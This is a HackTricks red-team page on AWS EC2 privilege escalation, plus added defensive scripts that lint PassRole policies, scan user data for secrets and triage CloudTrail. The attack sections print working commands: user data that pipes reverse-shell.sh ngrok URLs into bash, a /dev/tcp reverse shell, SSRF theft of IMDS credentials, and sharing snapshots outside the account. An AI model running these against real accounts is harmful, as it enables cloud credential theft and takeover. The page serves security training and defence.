AWS - EC2 Privesc
Reading time: 13 minutes
tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking:
HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
EC2
For information about EC2 check:
AWS - EC2, EBS, ELB, SSM, VPC & VPN Enum
iam:PassRole, ec2:RunInstances
An attacker could create an instance with an IAM role attached and then access that instance to steal the IAM role credentials from the metadata endpoint.
- Access via SSH
Run a new instance using a created ssh key (--key-name) and then ssh into it (if you want to create a new one you might need the permission ec2:CreateKeyPair).
aws ec2 run-instances --image-id <img-id> --instance-type t2.micro \
--iam-instance-profile Name=<instance-profile-name> --key-name <ssh-key> \
--security-group-ids <sg-id>
- Access via rev shell in user data
You can launch a new instance using user data (--user-data) that will send you a rev shell. You don't need to specify a security group this way.
echo '#!/bin/bash
curl https://reverse-shell.sh/4.tcp.ngrok.io:17031 | bash' > /tmp/rev.sh
aws ec2 run-instances --image-id <img-id> --instance-type t2.micro \
--iam-instance-profile Name=<instance-profile-name> \
--count 1 \
--user-data "file:///tmp/rev.sh"
Be careful with GuardDuty if you use the IAM role credentials outside the instance:
Potential Impact: Direct privesc to any EC2 role attached to existing instance profiles.
Privesc to ECS
With this set of permissions you could also create an EC2 instance and register it inside an ECS cluster. This way, ECS services will run inside the EC2 instance you have access to, and then you can compromise those services (docker containers) and steal their attached ECS roles.
aws ec2 run-instances \
--image-id ami-07fde2ae86109a2af \
--instance-type t2.micro \
--iam-instance-profile Name=<ECS_role> \
--count 1 --key-name pwned \
--user-data "file:///tmp/asd.sh"
# Make sure to use an ECS optimized AMI as it has everything installed for ECS already (amzn2-ami-ecs-hvm-2.0.20210520-x86_64-ebs)
# The EC2 instance profile needs basic ECS access
# The content of the user data is:
#!/bin/bash
echo ECS_CLUSTER=<cluster-name> >> /etc/ecs/ecs.config;echo ECS_BACKEND_HOST= >> /etc/ecs/ecs.config;
To learn how to force ECS services to run in this new EC2 instance check:
If you cannot create a new instance but have the permission ecs:RegisterContainerInstance, you might be able to register the instance inside the cluster and perform the attack described above.
Potential Impact: Direct privesc to ECS roles attached to tasks.
iam:PassRole, iam:AddRoleToInstanceProfile
As in the previous scenario, an attacker with these permissions could change the IAM role of a compromised instance so he can steal new credentials.
As an instance profile can only have 1 role, if the instance profile already has a role (the common case), you will also need iam:RemoveRoleFromInstanceProfile.
# Removing role from instance profile
aws iam remove-role-from-instance-profile --instance-profile-name <name> --role-name <name>
# Add role to instance profile
aws iam add-role-to-instance-profile --instance-profile-name <name> --role-name <name>
If the instance profile has a role and the attacker cannot remove it, there is another workaround. He could find an instance profile without a role or create a new one (iam:CreateInstanceProfile), add the role to that instance profile (as previously discussed), and associate that instance profile with a compromised instance:
- If the instance doesn't have any instance profile (ec2:AssociateIamInstanceProfile):
aws ec2 associate-iam-instance-profile --iam-instance-profile Name=<value> --instance-id <value>
Potential Impact: Direct privesc to a different EC2 role (you need to have compromised an AWS EC2 instance and some extra permission or a specific instance profile status).
iam:PassRole, ((ec2:AssociateIamInstanceProfile & ec2:DisassociateIamInstanceProfile) || ec2:ReplaceIamInstanceProfileAssociation)
With these permissions it's possible to change the instance profile associated with an instance, so if the attacker already had access to an instance he will be able to steal credentials of other instance profile roles by changing the one associated with it.
- If it has an instance profile, you can remove the instance profile (ec2:DisassociateIamInstanceProfile) and associate a different one:
aws ec2 describe-iam-instance-profile-associations --filters Name=instance-id,Values=i-0d36d47ba15d7b4da
aws ec2 disassociate-iam-instance-profile --association-id <value>
aws ec2 associate-iam-instance-profile --iam-instance-profile Name=<value> --instance-id <value>
- or replace the instance profile of the compromised instance (ec2:ReplaceIamInstanceProfileAssociation):
aws ec2 replace-iam-instance-profile-association --iam-instance-profile Name=<value> --association-id <value>
Potential Impact: Direct privesc to a different EC2 role (you need to have compromised an AWS EC2 instance and some extra permission or a specific instance profile status).
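Every path in the sections above (ec2:RunInstances, the Associate/Replace IamInstanceProfile actions, iam:AddRoleToInstanceProfile) only works because iam:PassRole is granted loosely: the fix is to pin PassRole to the specific role ARN and to the EC2 service with the iam:PassedToService condition. The following is an added example, not code from HackTricks, that lints IAM policy documents for PassRole statements missing those constraints and lists which role-consuming EC2/IAM actions sit in the same statement. The two policies are constructed samples and 111122223333 is a placeholder account id.

```python
"""Lint IAM policy documents for iam:PassRole grants broad enough to enable the
instance-profile privesc paths above (ec2:RunInstances, Associate/Replace
IamInstanceProfile and iam:AddRoleToInstanceProfile all evaluate iam:PassRole).
Example code added to this page; it is not HackTricks tooling. The two policy
documents are constructed samples and 111122223333 is a placeholder account."""
import fnmatch
import json

# EC2/IAM actions that hand a role to an instance; together with a loose PassRole
# in the same principal's permissions they become the privesc described above.
ROLE_CONSUMERS = (
    "ec2:RunInstances",
    "ec2:RequestSpotInstances",
    "ec2:AssociateIamInstanceProfile",
    "ec2:ReplaceIamInstanceProfileAssociation",
    "iam:AddRoleToInstanceProfile",
)


def _as_list(value):
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _matches(pattern, action):
    """IAM action patterns are case-insensitive and allow '*' wildcards."""
    return fnmatch.fnmatchcase(action.lower(), pattern.lower())


def _passed_to_service(statement):
    """iam:PassedToService values from a String* condition, or None if absent."""
    for operator, pairs in (statement.get("Condition") or {}).items():
        if operator.startswith("String"):
            for key, value in pairs.items():
                if key.lower() == "iam:passedtoservice":
                    return _as_list(value)
    return None


def audit_pass_role(policy):
    """One finding per Allow statement that grants iam:PassRole without pinning
    both the role ARN and the consuming service."""
    findings = []
    for index, stmt in enumerate(_as_list(policy.get("Statement"))):
        if stmt.get("Effect") != "Allow":
            continue
        actions = _as_list(stmt.get("Action"))
        if not any(_matches(a, "iam:PassRole") for a in actions):
            continue
        problems = []
        resources = _as_list(stmt.get("Resource"))
        if any(r == "*" or r.endswith(":role/*") for r in resources):
            problems.append("PassRole on wildcard role resource")
        if _passed_to_service(stmt) is None:
            problems.append("no iam:PassedToService condition")
        if problems:
            consumers = [c for c in ROLE_CONSUMERS if any(_matches(a, c) for a in actions)]
            findings.append({
                "statement": stmt.get("Sid", f"#{index}"),
                "problems": problems,
                "role_consumers_in_statement": consumers,
            })
    return findings


# Constructed sample: the "developers can launch anything" policy this page abuses.
LOOSE_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "DevLaunch",
        "Effect": "Allow",
        "Action": ["ec2:RunInstances", "ec2:AssociateIamInstanceProfile", "iam:PassRole"],
        "Resource": "*",
    }],
}

# Constructed sample: only one named role may be passed, and only to EC2.
SCOPED_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "Launch", "Effect": "Allow", "Action": "ec2:RunInstances", "Resource": "*"},
        {
            "Sid": "PassAppRoleToEc2Only",
            "Effect": "Allow",
            "Action": "iam:PassRole",
            "Resource": "arn:aws:iam::111122223333:role/app-role",
            "Condition": {"StringEquals": {"iam:PassedToService": "ec2.amazonaws.com"}},
        },
    ],
}

if __name__ == "__main__":
    for name, doc in (("loose", LOOSE_POLICY), ("scoped", SCOPED_POLICY)):
        print(name, json.dumps(audit_pass_role(doc), indent=2))
```

Run it against the policy documents you pull with `aws iam get-policy-version`; a statement that is flagged and also contains one of the role-consuming actions is exactly the combination the sections above turn into credential theft.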
ec2:RequestSpotInstances, iam:PassRole
An attacker with the permissions ec2:RequestSpotInstances and iam:PassRole can request a Spot Instance with an EC2 Role attached and a rev shell in the user data.
Once the instance is run, he can steal the IAM role.
REV=$(printf '#!/bin/bash
curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash
' | base64)
aws ec2 request-spot-instances \
--instance-count 1 \
--launch-specification "{\"IamInstanceProfile\":{\"Name\":\"EC2-CloudWatch-Agent-Role\"}, \"InstanceType\": \"t2.micro\", \"UserData\":\"$REV\", \"ImageId\": \"ami-0c1bc246476a5572b\"}"
ec2:ModifyInstanceAttribute
An attacker with ec2:ModifyInstanceAttribute can modify the instance attributes. Among them, he can change the user data, which means he can make the instance run arbitrary data. This can be used to get a rev shell to the EC2 instance.
Note that the attributes can only be modified while the instance is stopped, so the permissions ec2:StopInstances and ec2:StartInstances are also needed.
TEXT='Content-Type: multipart/mixed; boundary="//"
MIME-Version: 1.0
--//
Content-Type: text/cloud-config; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="cloud-config.txt"
#cloud-config
cloud_final_modules:
- [scripts-user, always]
--//
Content-Type: text/x-shellscript; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="userdata.txt"
#!/bin/bash
bash -i >& /dev/tcp/2.tcp.ngrok.io/14510 0>&1
--//'
TEXT_PATH="/tmp/text.b64.txt"
printf '%s' "$TEXT" | base64 > "$TEXT_PATH"
aws ec2 stop-instances --instance-ids $INSTANCE_ID
aws ec2 modify-instance-attribute \
--instance-id="$INSTANCE_ID" \
--attribute userData \
--value file://$TEXT_PATH
aws ec2 start-instances --instance-ids $INSTANCE_ID
Potential Impact: Direct privesc to any EC2 IAM Role attached to a created instance.
ec2:CreateLaunchTemplateVersion, ec2:CreateLaunchTemplate, ec2:ModifyLaunchTemplate
An attacker with the permissions ec2:CreateLaunchTemplateVersion, ec2:CreateLaunchTemplate and ec2:ModifyLaunchTemplate can create a new Launch Template version with a rev shell in the user data and any EC2 IAM Role on it, change the default version, and any Autoscaler group using that Launch Template that is configured to use the latest or the default version will re-run the instances using that template and execute the rev shell.
REV=$(printf '#!/bin/bash
curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash
' | base64)
aws ec2 create-launch-template-version \
--launch-template-name bad_template \
--launch-template-data "{\"ImageId\": \"ami-0c1bc246476a5572b\", \"InstanceType\": \"t3.micro\", \"IamInstanceProfile\": {\"Name\": \"ecsInstanceRole\"}, \"UserData\": \"$REV\"}"
aws ec2 modify-launch-template \
--launch-template-name bad_template \
--default-version 2
Potential Impact: Direct privesc to a different EC2 role.
(autoscaling:CreateLaunchConfiguration | ec2:CreateLaunchTemplate), iam:PassRole, (autoscaling:CreateAutoScalingGroup | autoscaling:UpdateAutoScalingGroup)
An attacker with the permissions autoscaling:CreateLaunchConfiguration, autoscaling:CreateAutoScalingGroup, iam:PassRole can create a Launch Configuration with an IAM Role and a rev shell inside the user data, then create an autoscaling group from that config and wait for the rev shell to steal the IAM Role.
aws --profile "$NON_PRIV_PROFILE_USER" autoscaling create-launch-configuration \
--launch-configuration-name bad_config \
--image-id ami-0c1bc246476a5572b \
--instance-type t3.micro \
--iam-instance-profile EC2-CloudWatch-Agent-Role \
--user-data "$REV"
aws --profile "$NON_PRIV_PROFILE_USER" autoscaling create-auto-scaling-group \
--auto-scaling-group-name bad_auto \
--min-size 1 --max-size 1 \
--launch-configuration-name bad_config \
--desired-capacity 1 \
--vpc-zone-identifier "subnet-e282f9b8"
Potential Impact: Direct privesc to a different EC2 role.
!autoscaling
The set of permissions ec2:CreateLaunchTemplate and autoscaling:CreateAutoScalingGroup is not enough to escalate privileges to an IAM role, because in order to attach the role specified in the Launch Configuration or in the Launch Template you need the permissions iam:PassRole and ec2:RunInstances (which is a known privesc).
ec2-instance-connect:SendSSHPublicKey
An attacker with the permission ec2-instance-connect:SendSSHPublicKey can add an ssh key to a user and use it to access the instance (if he has ssh access to it) or to escalate privileges.
aws ec2-instance-connect send-ssh-public-key \
--instance-id "$INSTANCE_ID" \
--instance-os-user "ec2-user" \
--ssh-public-key "file://$PUBK_PATH"
Potential Impact: Direct privesc to the EC2 IAM roles attached to running instances.
ec2-instance-connect:SendSerialConsoleSSHPublicKey
An attacker with the permission ec2-instance-connect:SendSerialConsoleSSHPublicKey can add an ssh key to a serial connection. If the serial console is not enabled, the attacker needs the permission ec2:EnableSerialConsoleAccess to enable it.
In order to connect to the serial port you also need to know the username and password of a user inside the machine.
aws ec2 enable-serial-console-access
aws ec2-instance-connect send-serial-console-ssh-public-key \
--instance-id "$INSTANCE_ID" \
--serial-port 0 \
--region "eu-west-1" \
--ssh-public-key "file://$PUBK_PATH"
ssh -i /tmp/priv $INSTANCE_ID.port0@serial-console.ec2-instance-connect.eu-west-1.aws
This way isn't very useful for privesc because you need to know a username and password to exploit it.
Potential Impact: (Hard to confirm) Direct privesc to the EC2 IAM roles attached to running instances.
describe-launch-templates, describe-launch-template-versions
Since launch templates are versioned, an attacker with the permissions ec2:describe-launch-templates and ec2:describe-launch-template-versions can use them to uncover sensitive information, such as credentials present in the user data. To do so, the following script iterates through all versions of the available launch templates:
for i in $(aws ec2 describe-launch-templates --region us-east-1 | jq -r '.LaunchTemplates[].LaunchTemplateId')
do
echo "[*] Analyzing $i"
aws ec2 describe-launch-template-versions --launch-template-id $i --region us-east-1 | jq -r '.LaunchTemplateVersions[] | "\(.VersionNumber) \(.LaunchTemplateData.UserData)"' | while read version userdata
do
echo "VersionNumber: $version"
echo "$userdata" | base64 -d
echo
done | grep -iE "aws_|password|token|api"
done
In the commands above, although we specify certain patterns (aws_|password|token|api), you could use a different regex to search for other kinds of sensitive information.
Once we find aws_access_key_id and aws_secret_access_key, we can use these credentials to authenticate to AWS.
Potential Impact: Direct privilege escalation to the IAM user(s).
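Old launch template versions are the place where static credentials linger after someone "fixed" the current version, so the same scan is worth running as a defender over your own templates, version by version, before rotating whatever it finds. The following added example (not HackTricks tooling) does what the grep loop above does in Python, but reports per pattern and per line, and also flattens cloud-init multipart MIME user data (the format used with ModifyInstanceAttribute above) so scripts nested inside it are scanned too. The versions are constructed; the AKIA.../wJalr... values are the AWS documentation example keys.

```python
"""Scan launch-template user data (base64, as DescribeLaunchTemplateVersions
returns it) for embedded secrets, version by version. Hygiene check added to
this page, not HackTricks tooling; the versions below are constructed and the
AKIA.../wJalr... values are AWS documentation example keys."""
import base64
import email
import re
from email import policy

# Same idea as the grep above, but one pattern per finding type so the report says what leaked.
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\b(AKIA|ASIA)[0-9A-Z]{16}\b"),
    "aws_secret_access_key": re.compile(r"aws_secret_access_key\s*[=:]\s*\S+", re.I),
    "password": re.compile(r"password\s*[=:]\s*\S+", re.I),
    "token_or_api_key": re.compile(r"\b(token|api[_-]?key)\s*[=:]\s*\S+", re.I),
}


def decode_user_data(b64):
    """Decode user data; if it is a cloud-init multipart MIME document, flatten
    every non-multipart part so shell scripts inside it are scanned too."""
    raw = base64.b64decode(b64).decode("utf-8", "replace")
    if raw.lstrip().lower().startswith("content-type: multipart/"):
        msg = email.message_from_string(raw, policy=policy.default)
        return "\n".join(p.get_content() for p in msg.walk() if not p.is_multipart())
    return raw


def scan_text(text):
    """Return [(line_number, pattern_name)] for every line matching a pattern."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, pattern in SECRET_PATTERNS.items():
            if pattern.search(line):
                hits.append((lineno, name))
    return hits


def scan_template_versions(versions):
    """versions: list of dicts shaped like LaunchTemplateVersions[] entries.
    Returns {VersionNumber: hits} for the versions whose user data leaks something."""
    report = {}
    for version in versions:
        user_data = version.get("LaunchTemplateData", {}).get("UserData")
        if not user_data:
            continue
        hits = scan_text(decode_user_data(user_data))
        if hits:
            report[version["VersionNumber"]] = hits
    return report


def _b64(text):
    return base64.b64encode(text.encode()).decode()


# Constructed sample: v1 hard-codes static keys, v2 fixed it, v3 buries a
# database password inside a multipart cloud-init document.
SAMPLE_VERSIONS = [
    {"VersionNumber": 1, "LaunchTemplateData": {"UserData": _b64(
        "#!/bin/bash\n"
        "export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE\n"
        "export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n"
        "aws s3 sync s3://example-bucket /opt/app\n")}},
    {"VersionNumber": 2, "LaunchTemplateData": {"UserData": _b64(
        "#!/bin/bash\n# credentials now come from the instance profile\n"
        "aws s3 sync s3://example-bucket /opt/app\n")}},
    {"VersionNumber": 3, "LaunchTemplateData": {"UserData": _b64(
        'Content-Type: multipart/mixed; boundary="//"\nMIME-Version: 1.0\n\n'
        '--//\nContent-Type: text/x-shellscript; charset="us-ascii"\n\n'
        "#!/bin/bash\nmysql -u app --password=S3cretExample < /opt/schema.sql\n"
        "--//--\n")}},
]

if __name__ == "__main__":
    for number, hits in scan_template_versions(SAMPLE_VERSIONS).items():
        print(f"version {number}: {hits}")
```

Feed it the `LaunchTemplateVersions` array from `aws ec2 describe-launch-template-versions --output json`; a finding in any version, not just the default one, means the secret must be rotated, since every version stays readable to anyone with the describe permissions.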
ec2:ModifyInstanceMetadataOptions (Downgrading IMDS to enable credential theft via SSRF)
An attacker able to call ec2:ModifyInstanceMetadataOptions on a victim's EC2 instance can weaken the IMDS protections by enabling IMDSv1 (HttpTokens=optional) and raising the HttpPutResponseHopLimit. This makes the instance metadata endpoint reachable through common SSRF/proxy paths from applications running on the instance. If the attacker can trigger an SSRF in such an app, they can obtain the instance profile credentials and use them to access other resources.
- Required permissions: ec2:ModifyInstanceMetadataOptions on the target instance (and the ability to reach/trigger an SSRF on the host).
- Target resource: a running EC2 instance with an instance profile (IAM role) attached.
Example commands:
# 1) Check current metadata settings
aws ec2 describe-instances --instance-id <INSTANCE_ID> \
--query 'Reservations[0].Instances[0].MetadataOptions'
# 2) Downgrade IMDS protections (enable IMDSv1 and raise hop limit)
aws ec2 modify-instance-metadata-options --instance-id <INSTANCE_ID> \
--http-endpoint enabled --http-tokens optional \
--http-put-response-hop-limit 3 --instance-metadata-tags enabled
# 3) Through the SSRF, enumerate role name
curl "http://<VICTIM_PUBLIC_IP>:<APP_PORT>/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/"
# 4) Through the SSRF, steal the temporary credentials
curl "http://<VICTIM_PUBLIC_IP>:<APP_PORT>/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/<ROLE_NAME>"
# 5) Use the stolen credentials
export AWS_ACCESS_KEY_ID=<AccessKeyId>
export AWS_SECRET_ACCESS_KEY=<SecretAccessKey>
export AWS_SESSION_TOKEN=<Token>
aws sts get-caller-identity
# 6) Restore protections (require IMDSv2, low hop limit)
aws ec2 modify-instance-metadata-options --instance-id <INSTANCE_ID> \
--http-tokens required --http-put-response-hop-limit 1
Potential Impact: Theft of instance profile credentials via SSRF, leading to privilege escalation and lateral movement using the EC2 role's permissions.
ec2:ModifyInstanceMetadataOptions
An attacker with the permission ec2:ModifyInstanceMetadataOptions can weaken the Instance Metadata Service (IMDS) protections, for example by forcing IMDSv1 (making HttpTokens not required) or by raising the HttpPutResponseHopLimit, making it easier to exfiltrate temporary credentials. The most relevant risk vector is raising HttpPutResponseHopLimit: by increasing that hop limit (TTL), the 169.254.169.254 endpoint stops being fully confined to the VM's network namespace and becomes reachable from other processes/containers, enabling credential theft.
aws ec2 modify-instance-metadata-options \
--instance-id <INSTANCE_ID> \
--http-tokens optional \
--http-endpoint enabled \
--http-put-response-hop-limit 2
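The two IMDS sections above describe a state change, so the defender's check is a posture audit of `MetadataOptions` on every instance rather than a one-off command. The following is an added example (not HackTricks code) that evaluates the instance dicts returned by `aws ec2 describe-instances`, reports the two weaknesses discussed (IMDSv1 accepted, hop limit above 1), notes when no role is attached so the finding is lower impact, and produces the hardening call. The instances are constructed and 111122223333 is a placeholder account id.

```python
"""Audit the MetadataOptions block of EC2 instances (describe-instances shape)
for the IMDS weaknesses described above and emit the hardening command.
Example added to this page, not HackTricks tooling; instances are constructed."""


def assess_imds(instance):
    """Findings for one instance dict (Reservations[].Instances[] shape)."""
    opts = instance.get("MetadataOptions") or {}
    findings = []
    if opts.get("HttpEndpoint") == "disabled":
        return findings  # IMDS is off entirely: nothing behind it to steal
    if opts.get("HttpTokens") != "required":
        # A plain GET returns credentials, which is what an SSRF can issue.
        findings.append("imds-v1-allowed")
    if int(opts.get("HttpPutResponseHopLimit", 1)) > 1:
        # The IMDSv2 token PUT response may cross a container/NAT hop.
        findings.append("hop-limit-above-1")
    if findings and not instance.get("IamInstanceProfile"):
        # Weak settings but no role: still wrong, but no role credentials exposed.
        findings.append("no-role-attached")
    return findings


def harden_command(instance_id):
    """The remediating call: same API the attacker abuses, hardened values."""
    return (f"aws ec2 modify-instance-metadata-options --instance-id {instance_id} "
            "--http-tokens required --http-put-response-hop-limit 1")


def audit(instances):
    """{InstanceId: findings} for instances with at least one weakness."""
    report = {}
    for inst in instances:
        findings = assess_imds(inst)
        if findings:
            report[inst["InstanceId"]] = findings
    return report


# Constructed sample: flattened describe-instances output for four instances.
_PROFILE = {"Arn": "arn:aws:iam::111122223333:instance-profile/app-profile"}
SAMPLE_INSTANCES = [
    {"InstanceId": "i-0aaa000000000001", "IamInstanceProfile": _PROFILE,
     "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "required", "HttpPutResponseHopLimit": 1}},
    {"InstanceId": "i-0aaa000000000002", "IamInstanceProfile": _PROFILE,
     "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "optional", "HttpPutResponseHopLimit": 3}},
    {"InstanceId": "i-0aaa000000000003",
     "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "optional", "HttpPutResponseHopLimit": 1}},
    {"InstanceId": "i-0aaa000000000004", "IamInstanceProfile": _PROFILE,
     "MetadataOptions": {"HttpEndpoint": "disabled", "HttpTokens": "optional", "HttpPutResponseHopLimit": 2}},
]

if __name__ == "__main__":
    for instance_id, findings in audit(SAMPLE_INSTANCES).items():
        print(instance_id, findings)
        print("  fix:", harden_command(instance_id))
```

Treat `hop-limit-above-1` with some judgement: workloads that run containers on the instance legitimately need a hop limit of 2 for IMDSv2 to work from inside the container network, so the finding there is a review item rather than an automatic reset, whereas `imds-v1-allowed` on a role-bearing instance should simply be fixed.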
ec2:ModifyImageAttribute, ec2:ModifySnapshotAttribute
An attacker with the permissions ec2:ModifyImageAttribute and ec2:ModifySnapshotAttribute can share AMIs or snapshots with other AWS accounts (or even make them public), exposing images or volumes that could contain sensitive data such as configuration, credentials, certificates, or backups. By modifying the AMI's launch permissions or the snapshot's create-volume permissions, the attacker allows third parties to launch instances or mount disks from those resources and access their contents.
To share an AMI with another account:
aws ec2 modify-image-attribute --image-id <image_ID> --launch-permission "Add=[{UserId=<recipient_account_ID>}]" --region <AWS_region>
To share an EBS snapshot with another account:
aws ec2 modify-snapshot-attribute --snapshot-id <snapshot_ID> --create-volume-permission "Add=[{UserId=<recipient_account_ID>}]" --region <AWS_region>
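Every technique on this page is a control-plane API call, so each one leaves a CloudTrail record, and a single triage pass can cover all of them: launches that pass a role (the ec2:RunInstances and ec2:RequestSpotInstances sections), instance-profile swaps and iam:AddRoleToInstanceProfile, user-data rewrites via ec2:ModifyInstanceAttribute, launch template and Auto Scaling changes, ec2:ModifyInstanceMetadataOptions downgrades, EC2 Instance Connect key pushes, and AMI/snapshot sharing outside the account. The following is an added example, not HackTricks tooling. The records are constructed and simplified CloudTrail JSON; because the nesting inside requestParameters differs per API, the field lookups are recursive and case-insensitive rather than tied to one exact layout, and 111122223333 is a placeholder account id.

```python
"""Triage CloudTrail records for the EC2 privesc paths described on this page.
Example added here, not HackTricks tooling. Records are constructed and
simplified; real requestParameters nesting varies per API, so lookups walk the
whole structure case-insensitively instead of assuming one layout."""

LAUNCH_WITH_ROLE = {"RunInstances", "RequestSpotInstances"}
PROFILE_CHANGES = {"AssociateIamInstanceProfile", "ReplaceIamInstanceProfileAssociation",
                   "AddRoleToInstanceProfile"}
LAUNCH_CONFIG_CHANGES = {"CreateLaunchTemplate", "CreateLaunchTemplateVersion", "ModifyLaunchTemplate",
                         "CreateLaunchConfiguration", "CreateAutoScalingGroup", "UpdateAutoScalingGroup"}
KEY_PUSHES = {"SendSSHPublicKey", "SendSerialConsoleSSHPublicKey"}
SHARING = {"ModifyImageAttribute", "ModifySnapshotAttribute"}


def _walk(obj):
    """Yield (key, value) for every key at any depth of a dict/list structure."""
    if isinstance(obj, dict):
        for key, value in obj.items():
            yield key, value
            yield from _walk(value)
    elif isinstance(obj, list):
        for item in obj:
            yield from _walk(item)


def _find(params, wanted):
    """First value stored under `wanted` (case-insensitive) anywhere in requestParameters."""
    for key, value in _walk(params):
        if key.lower() == wanted.lower():
            return value
    return None


def _grants_outside_account(params, own_account):
    """True if a launchPermission/createVolumePermission 'add' names another account or 'all'."""
    for key, value in _walk(_find(params, "add")):
        if key.lower() == "group" and value == "all":
            return True
        if key.lower() == "userid" and value != own_account:
            return True
    return False


def classify(event):
    """Tags saying why this record matters; empty when it does not."""
    name = event.get("eventName", "")
    params = event.get("requestParameters") or {}
    tags = []
    if name in LAUNCH_WITH_ROLE and _find(params, "iamInstanceProfile") is not None:
        tags.append("launch-with-role")
        if _find(params, "userData") is not None:
            tags.append("user-data-at-launch")
    if name in PROFILE_CHANGES:
        tags.append("instance-profile-change")
    if name == "ModifyInstanceAttribute" and _find(params, "userData") is not None:
        tags.append("user-data-rewrite")
    if name in LAUNCH_CONFIG_CHANGES:
        tags.append("launch-config-change")
    if name == "ModifyInstanceMetadataOptions":
        if _find(params, "httpTokens") == "optional":
            tags.append("imds-v1-enabled")
        hop = _find(params, "httpPutResponseHopLimit")
        if hop is not None and int(hop) > 1:
            tags.append("imds-hop-limit-raised")
    if name in KEY_PUSHES:
        tags.append("ssh-key-pushed")
    if name in SHARING and _grants_outside_account(params, event.get("recipientAccountId")):
        tags.append("shared-outside-account")
    return tags


def triage(events):
    """[(eventName, caller ARN, tags)] for the records that matched a rule."""
    hits = []
    for event in events:
        tags = classify(event)
        if tags:
            hits.append((event.get("eventName"), (event.get("userIdentity") or {}).get("arn"), tags))
    return hits


# Constructed, simplified CloudTrail records; "dGVzdA==" stands in for real user data.
_CALLER = {"arn": "arn:aws:iam::111122223333:user/dev"}
_ACCOUNT = "111122223333"
SAMPLE_EVENTS = [
    {"eventName": "DescribeInstances", "recipientAccountId": _ACCOUNT, "userIdentity": _CALLER,
     "requestParameters": {"instancesSet": {}}},
    {"eventName": "RunInstances", "recipientAccountId": _ACCOUNT, "userIdentity": _CALLER,
     "requestParameters": {"instanceType": "t2.micro", "iamInstanceProfile": {"name": "app-profile"},
                           "userData": "dGVzdA=="}},
    {"eventName": "ModifyInstanceAttribute", "recipientAccountId": _ACCOUNT, "userIdentity": _CALLER,
     "requestParameters": {"instanceId": "i-0aaa000000000002", "userData": {"value": "dGVzdA=="}}},
    {"eventName": "ModifyInstanceMetadataOptions", "recipientAccountId": _ACCOUNT, "userIdentity": _CALLER,
     "requestParameters": {"ModifyInstanceMetadataOptionsRequest": {
         "InstanceId": "i-0aaa000000000002", "HttpTokens": "optional", "HttpPutResponseHopLimit": 3}}},
    {"eventName": "ModifySnapshotAttribute", "recipientAccountId": _ACCOUNT, "userIdentity": _CALLER,
     "requestParameters": {"snapshotId": "snap-0aaa000000000001",
                           "createVolumePermission": {"add": {"items": [{"userId": "999999999999"}]}}}},
]

if __name__ == "__main__":
    for name, caller, tags in triage(SAMPLE_EVENTS):
        print(f"{name:32} {caller} {tags}")
```

The tags are deliberately coarse: the useful signal is a principal that normally only describes things suddenly producing `launch-with-role` plus `user-data-at-launch`, or a `user-data-rewrite` sandwiched between StopInstances and StartInstances, which is the exact sequence the ec2:ModifyInstanceAttribute section shows.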